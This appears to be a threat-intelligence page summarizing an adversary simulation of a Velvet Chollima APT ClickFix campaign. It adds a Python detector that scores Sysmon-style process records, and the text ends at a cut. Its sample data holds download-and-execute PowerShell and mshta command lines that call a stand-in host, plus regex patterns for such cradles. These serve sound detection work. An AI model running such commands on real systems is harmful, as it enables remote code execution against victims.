lazarusholic


Velvet Chollima APT Adversary Simulation

2025-05-23, S3N4T0R
https://medium.com/@S3N4T0R/velvet-chollima-apt-adversary-simulation-89c5159e7fc1
#VelvetChollima


Velvet Chollima APT Adversary Simulation
This is a simulation of an attack by the Velvet Chollima APT group targeting South Korean government officials. The attack campaign began in January 2025 and also targeted NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia. The attack chain starts with a spear-phishing email carrying a PDF attachment. When targets try to open the document, they are instead redirected to a fake CAPTCHA page that instructs them to run PowerShell as an administrator and execute attacker-provided code. This simulation is based on research from Microsoft Threat Intelligence and BleepingComputer: https://www.bleepingcomputer.com/news/security/dprk-hackers-dupe-targets-into-typing-powershell-commands-as-admin/
The attackers used a new tactic known as ClickFix, a social engineering technique that has gained traction, particularly for distributing malware.
ClickFix involves deceptive error messages or prompts that trick victims into executing malicious code themselves, often via PowerShell commands, ultimately leading to malware infections.
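Because ClickFix relies on the victim typing or pasting a command into an interactive shell, the defender's signal is a scripting host launched by the user's own session (not by an installer or build tool) with a remote-fetch command line, often elevated. The following is an added detection example written for this page, not code from the article or from S3N4T0R; it scores constructed Sysmon-style process-creation records against those traits. All sample hosts, paths and command lines are made up.

```python
import re

# Constructed process-creation records in Sysmon Event ID 1 field style (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",           # Win+R / Start-menu launch
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "IntegrityLevel": "High",                            # victim chose "run as administrator"
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://captcha.example.invalid/v | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "IntegrityLevel": "Medium",
     "CommandLine": "mshta http://captcha.example.invalid/verify.hta"},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",  # benign developer activity
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "IntegrityLevel": "Medium",
     "CommandLine": "powershell -NoProfile -File .\\build.ps1"},
]

INTERACTIVE_PARENTS = {"explorer.exe"}                      # shells the user launched by hand
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# (regex, weight, label): command-line traits typical of pasted ClickFix one-liners.
INDICATORS = [
    (r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b.*\|\s*(iex|invoke-expression)\b",
     3, "download-and-execute cradle"),
    (r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 3, "base64-encoded command"),
    (r"mshta(\.exe)?\s+https?://", 3, "mshta fetching remote content"),
    (r"-w(indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-(ep|exec|executionpolicy)\s+bypass", 1, "execution policy bypass"),
]

def score_event(ev):
    """Return (score, reasons) for one process-creation record; 0 for non-script hosts."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += 2; reasons.append(f"launched from {parent} (user-typed or pasted)")
    if ev.get("IntegrityLevel") == "High":
        score += 1; reasons.append("running elevated")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, ev["CommandLine"], re.IGNORECASE):
            score += weight; reasons.append(label)
    return score, reasons

def find_clickfix_candidates(events, threshold=5):
    """Return (score, command line) for records at or above the alert threshold."""
    scored = ((score_event(ev)[0], ev["CommandLine"]) for ev in events)
    return [(s, cmd) for s, cmd in scored if s >= threshold]
```

The threshold keeps ordinary scripted PowerShell (build tools, scheduled tasks) below the alert line; tune the weights against your own baseline before enforcing.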
Microsoft's Threat Intelligence: https://x.com/MsftSecIntel/status/1889407814604296490
According to Microsoft's Threat Intelligence …